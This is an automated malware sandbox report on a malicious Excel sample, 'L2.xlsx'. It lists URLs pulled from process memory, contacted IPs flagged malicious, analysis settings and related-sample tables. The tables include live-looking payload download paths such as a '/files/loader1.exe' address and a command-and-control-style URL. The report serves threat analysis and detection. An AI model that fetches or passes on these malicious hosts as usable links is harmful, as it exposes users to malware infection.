                                        http://rover.ebay.comexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://search.ebay.in/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://%s.comexplorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		low
                                                http://msk.afisha.ru/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://search.rediff.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://search.naver.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.google.ru/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://search.daum.net/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://buscar.ozu.es/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.about.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.ask.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.cjmall.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://search.centrum.cz/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://suche.t-online.de/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.google.it/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://search.auction.co.kr/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.ceneo.pl/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.amazon.de/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.2146948401.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2140324393.0000000000409000.00000008.00020000.sdmpfalse
                                                                                          		high
                                                                                          http://sads.myspace.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://search.sify.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://search.ebay.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://search.nifty.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.google.si/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.google.cz/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.soso.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.univision.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://search.ebay.it/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://busca.orange.es/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://www.target.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://buscador.terra.es/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.iask.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.tesco.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://search.interpark.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://investor.msn.com/explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://search.espn.go.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://service2.bfast.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://www.%s.comPAvbc.exe, 00000004.00000002.2149612513.0000000002330000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2153195546.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		low
                                                                                                                                                http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.news.com.au/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  192.210.173.40
                                                                                                                                                  		unknownUnited States
                                                                                                                                                  		36352AS-COLOCROSSINGUStrue
                                                                                                                                                  154.84.76.49
                                                                                                                                                  		www.alberthospice.comSeychelles
                                                                                                                                                  		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                  45.195.169.197
                                                                                                                                                  		www.meganfantastic.comSeychelles
                                                                                                                                                  		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue

                                                                                                                                                  Private

                                                                                                                                                  IP
                                                                                                                                                  127.0.0.1

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:433039
                                                                                                                                                  Start date:11.06.2021
                                                                                                                                                  Start time:08:05:32
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 10m 53s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:L2.xlsx
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                  Number of analysed new started processes analysed:11
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSX@9/21@8/4
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 21.5% (good quality ratio 20.7%)
                                                                                                                                                  • Quality average: 76.1%
                                                                                                                                                  • Quality standard deviation: 26.9%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 87%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsx
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.67.150.126, 104.21.89.254
                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.sciencebasedmasks.com.cdn.cloudflare.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  08:07:02API Interceptor65x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                  08:07:08API Interceptor35x Sleep call for process: vbc.exe modified
                                                                                                                                                  08:07:28API Interceptor254x Sleep call for process: control.exe modified
                                                                                                                                                  08:08:26API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  192.210.173.40Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 192.210.173.40/files/loader1.exe
                                                                                                                                                  MT103-payment confirmation.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 192.210.173.40/files/loader2.exe
                                                                                                                                                  Agency Appointment for Mv TBN Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 192.210.173.40/files/loader1.exe
                                                                                                                                                  154.84.76.49MT103-payment confirmation.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • www.alberthospice.com/sh2m/?9rfdV=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w==&LP98=qtatzL

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  www.alberthospice.comMT103-payment confirmation.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 154.84.76.49

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  AS-COLOCROSSINGUSAgency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 192.210.173.40
                                                                                                                                                  Request Letter for Courtesy Call.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 198.12.110.183
                                                                                                                                                  ORDEN 47458.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 198.12.110.183
                                                                                                                                                  Descuentos de hasta el 40%.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 198.12.110.183
                                                                                                                                                  crt9O3URua.exeGet hashmaliciousBrowse
                                                                                                                                                  • 198.23.140.76
                                                                                                                                                  _VM0_03064853.HtMGet hashmaliciousBrowse
                                                                                                                                                  • 23.94.52.94
                                                                                                                                                  1LvgZjt4iv.exeGet hashmaliciousBrowse
                                                                                                                                                  • 198.46.177.119
                                                                                                                                                  PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 198.23.221.170
                                                                                                                                                  Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 198.12.127.155
                                                                                                                                                  xYKsdzAUj8.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.210.198.12
                                                                                                                                                  lsQ72VytAw.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.210.198.12
                                                                                                                                                  EDxI6b8IKs.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.210.198.12
                                                                                                                                                  ouGTVjHuUq.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.210.198.12
                                                                                                                                                  vbc.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 107.173.219.35
                                                                                                                                                  PO.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 198.12.110.183
                                                                                                                                                  Duplicated Orders.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 198.12.110.183
                                                                                                                                                  pago.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 192.227.228.121
                                                                                                                                                  DEPOSITAR.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 198.12.110.183
                                                                                                                                                  HT.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 198.12.110.183
                                                                                                                                                  order 4806125050.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 192.227.228.121
                                                                                                                                                  DXTL-HKDXTLTseungKwanOServiceHKGiG35Rwmz6.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.214.84.117
                                                                                                                                                  RFQ-21-QAI-OPS-0067 (7000000061).exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.84.83.5
                                                                                                                                                  kmEVWJjPV6esObh.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.203.107.209
                                                                                                                                                  rtgs_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.218.86.231
                                                                                                                                                  Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.80.207.57
                                                                                                                                                  MT103-payment confirmation.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 154.84.76.49
                                                                                                                                                  New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.194.139.173
                                                                                                                                                  17jLieeOPx.exeGet hashmaliciousBrowse
                                                                                                                                                  • 156.237.130.173
                                                                                                                                                  SKMBT41085NC9.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.212.65.23
                                                                                                                                                  Product_Samples.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.95.193.124
                                                                                                                                                  RE; KOC RFQ for Flangers - RFQ 22965431.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.83.72.159
                                                                                                                                                  RE KOC RFQ for Flanges - RFQ 2074898.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.83.72.159
                                                                                                                                                  item.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.95.193.124
                                                                                                                                                  Payment SWIFT_Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.199.77.202
                                                                                                                                                  Payment Advice-Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.199.77.202
                                                                                                                                                  Ack0527073465.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.93.191.132
                                                                                                                                                  PO#270521.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.80.241.154
                                                                                                                                                  List doc__Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 156.238.108.75
                                                                                                                                                  #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 156.239.112.237
                                                                                                                                                  Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.199.37.6
                                                                                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHKtriage_dropped_file.exeGet hashmaliciousBrowse
                                                                                                                                                  • 107.151.118.54
                                                                                                                                                  fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.142.209
                                                                                                                                                  PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.51.167.23
                                                                                                                                                  Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.51.167.23
                                                                                                                                                  LQrGhleECP.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.220.41.208
                                                                                                                                                  Shipping Docs677.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.201.218.227
                                                                                                                                                  Benatos June Order-Project 2021 Specification Document and company Profile _PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.220.38.217
                                                                                                                                                  Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.142.50
                                                                                                                                                  PO#270521.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.213.230.241
                                                                                                                                                  ORDER LIST.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.51.167.23
                                                                                                                                                  pago sunat 250521.exeGet hashmaliciousBrowse
                                                                                                                                                  • 83.150.226.209
                                                                                                                                                  Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.86.39.23
                                                                                                                                                  xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.11.194
                                                                                                                                                  Purchase Inquiry&Product Specification.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.86.39.23
                                                                                                                                                  New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.92.68.17
                                                                                                                                                  f268bad6_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.137.188
                                                                                                                                                  RFQ - 001.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.11.194
                                                                                                                                                  vZMIGFMR.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.201.247.101
                                                                                                                                                  28084876_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.213.62.167
                                                                                                                                                  Ydomibnfzakfagtujeyntncjklfpfrinlj_Signed_.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.216.241.129

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dllAgency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                                                                                                    New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      2320900000000.exeGet hashmaliciousBrowse
                                                                                                                                                        CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                                                                                                          5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                                                                                                            i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                                                                                                              AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                                                                                                                090049000009000.exeGet hashmaliciousBrowse
                                                                                                                                                                  dYy3yfSkwY.exeGet hashmaliciousBrowse
